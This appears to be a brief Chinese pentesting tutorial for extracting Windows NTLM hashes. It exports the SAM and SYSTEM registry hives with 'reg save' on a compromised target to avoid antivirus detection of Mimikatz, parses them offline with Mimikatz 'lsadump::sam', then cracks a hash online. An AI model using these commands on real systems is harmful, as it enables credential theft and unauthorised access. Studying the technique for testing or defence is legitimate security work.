使用场景

已获取system权限,无法在目标机器上上传Mimikatz(有杀软或者限制啥的),这个时候可以通过reg命令导出SAM和SYSTEM文件,离线读取出NTML HASH,其实也可以用procdump64和mimikatz抓取Windows用户密码,这个小技巧算是另外一种方式吧

利用方式

首先导出两个文件,可能需要管理员权限 ,CMD或者Powershell运行都可以。

1
2
reg save hklm\sam sam.hive
reg save hklm\system system.hive

1

然后将这两个hive文件放到和Mimikatz同一个目录下,你可将目标机器的这两个文件拖出来到自己机器上尝试

mimikatz下载链接:https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200809

2

运行mimikatz,输入命令

1
lsadump::sam /sam:sam.hive /system:system.hive

ntlm
获取NTML后,我们对其进行解密,就随便找个稍微好用的解密网站就行,这里用cmd5进行解密
123456